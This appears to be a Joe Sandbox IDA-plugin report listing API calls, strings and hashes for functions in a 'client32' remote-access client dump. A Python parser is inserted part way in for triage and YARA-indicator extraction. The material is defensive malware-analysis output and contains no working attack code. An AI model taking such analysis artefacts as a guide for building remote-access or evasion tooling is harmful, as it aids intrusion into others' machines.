• Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
APIs
  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
  • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
• wsprintfA.USER32 ref: 1100977F
• wsprintfA.USER32 ref: 11009799
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
• String ID: %s%s.htm$.%u$ApprovedWebList$Store\
• API String ID: 559337438-1872371932
• Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
• Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
• Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
• Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
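The function blocks above are the Joe Sandbox IDA plugin's per-function export from the client32 dump: each block lists the Win32/CRT calls the function makes (calls attributed to a callee are indented as "Part of subcall function"), recovered string literals with their xrefs, the memory dump the function was lifted from, and "$"-joined API and string identifiers with fuzzy hashes. When triaging a report of this size it is quicker to parse these blocks than to read them. The Python below is an added example, not code from the Joe Sandbox report or from NetSupport, that parses such blocks into records and pulls out what a responder cares about: the ordered API sequence, literal names passed to GetProcAddress/GetModuleHandle/LoadLibrary (here kernel32.dll and ProcessIdToSessionId), CreateFileA calls whose dwDesiredAccess carries GENERIC_WRITE, and the string indicators (ApprovedWebList, Store\, %s%s.htm) for pivoting or drafting a YARA rule. The sample text is constructed from two of the entries on this page; the record and helper names are my own.

```python
"""Parse Joe Sandbox IDA-plugin function listings (added example, not report code)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Section headings the plugin emits for every function block.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR: " when the call is made by a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z][A-Z0-9]*)"
    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")
HEX_OR_UNKNOWN = re.compile(r"-?[0-9A-F]{8}|\?")   # recovered stack slot, not a literal
DYN_RESOLVERS = {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
                 "LoadLibraryA", "LoadLibraryW"}
GENERIC_WRITE = 0x40000000

# Constructed sample: two blocks copied in the plugin's layout (no live data needed).
SAMPLE = """\
APIs
  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
• wsprintfA.USER32 ref: 1100977F
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
• String ID: %s%s.htm$.%u$ApprovedWebList$Store\\
• API String ID: 559337438-1872371932
• Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
APIs
• GetWindowRect.USER32(?,?), ref: 111194E1
• GetSystemMetrics.USER32(00000003), ref: 11119559
Strings
• GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
Similarity
• API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
• String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall: Optional[str] = None   # callee address when reported as a subcall

@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

def parse_listing(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    section, cur = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":          # every function block opens with its API list
                cur = FunctionEntry()
                entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(body)):
            cur.strings.append(m["text"])
        elif section == "Similarity":
            key, _, value = body.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return entries

def api_sequence(entry: FunctionEntry) -> list[str]:
    """Direct calls in listing order, excluding calls attributed to subcalls."""
    return [f"{c.name}.{c.module}" for c in entry.apis if c.subcall is None]

def dynamic_resolution(entry: FunctionEntry) -> list[str]:
    """Literal names seen in GetProcAddress/GetModuleHandle/LoadLibrary arguments."""
    return [a for c in entry.apis if c.name in DYN_RESOLVERS
            for a in c.args if not HEX_OR_UNKNOWN.fullmatch(a)]

def write_opens(entry: FunctionEntry) -> list[str]:
    """refs of CreateFileA/W calls whose dwDesiredAccess (2nd arg) includes GENERIC_WRITE."""
    out = []
    for c in entry.apis:
        if c.name in ("CreateFileA", "CreateFileW") and len(c.args) > 1 \
                and re.fullmatch(r"[0-9A-F]{8}", c.args[1]) \
                and int(c.args[1], 16) & GENERIC_WRITE:
            out.append(c.ref)
    return out

def similarity_strings(entry: FunctionEntry) -> list[str]:
    """Individual literals from the '$'-joined 'String ID' field."""
    return [s for s in entry.similarity.get("String ID", "").split("$") if s]

def string_indicators(entries: list[FunctionEntry]) -> list[str]:
    """Union of recovered strings across all blocks, for pivoting or YARA drafting."""
    seen: set[str] = set()
    for e in entries:
        seen.update(e.strings)
        seen.update(similarity_strings(e))
    return sorted(seen)

if __name__ == "__main__":
    for i, e in enumerate(parse_listing(SAMPLE)):
        print(i, api_sequence(e), dynamic_resolution(e), write_opens(e))
    print(string_indicators(parse_listing(SAMPLE)))
```

To run it over a real report, paste the "APIs" ... "Similarity" blocks into a file and pass its contents to parse_listing in place of SAMPLE; the "Download File" link text that web extraction appends to the .sdmp lines is ignored because those sections are not parsed. The argument values are what the plugin recovered from the stack at analysis time, so a literal such as ProcessIdToSessionId next to GetModuleHandleA is evidence of the name being resolved at run time, not proof of the call order inside the callee.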
APIs
• GetDlgItem.USER32(?,?), ref: 11025351
  • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
  • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
  • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
  • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
  • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
  • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
  • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
  • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
• SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
• SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
• SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
• String ID: 8
• API String ID: 762489935-4194326291
• Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
• Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                  • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                  • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                                  • _memset.LIBCMT ref: 11005240
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                  • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                  • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                                  • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2755257978-4108050209
                                                                                  • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                  • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                  • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                  • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,76230BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                    • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                  • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                  • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                  • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                  • API String ID: 2999768849-588814233
                                                                                  • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                  • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                  • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                  • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 1101D750
                                                                                  • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                  • _memset.LIBCMT ref: 1101D77A
                                                                                  • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                  • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                  • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                  • String ID: NSMChatSizeWnd
                                                                                  • API String ID: 2883038198-4119039562
                                                                                  • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                  • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                                  • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                                  • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 110334CA
                                                                                  • _memset.LIBCMT ref: 11033501
                                                                                  • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                                  • GetLastError.KERNEL32 ref: 11033534
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • _memmove.LIBCMT ref: 1103357E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                  • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                  • API String ID: 2414640225-228067302
                                                                                  • Opcode ID: 76f9c5726567c3eb2844e41b2fa8f9e8a8cde90983372ff24c802c7d4c115bf6
                                                                                  • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                  • Opcode Fuzzy Hash: 76f9c5726567c3eb2844e41b2fa8f9e8a8cde90983372ff24c802c7d4c115bf6
                                                                                  • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                  APIs
                                                                                  Strings
                                                                                  • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                  • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                  • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                  • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                  • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                  • API String ID: 4250438611-314227603
                                                                                  • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                  • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                  • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                  • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                  APIs
                                                                                  • _strncmp.LIBCMT ref: 1100953A
                                                                                  • _strncmp.LIBCMT ref: 1100954A
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,50D94AA1), ref: 110095EB
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                  • IsA(), xrefs: 110095A5, 110095CD
                                                                                  • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                  • http://, xrefs: 11009535, 11009548
                                                                                  • https://, xrefs: 1100952F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
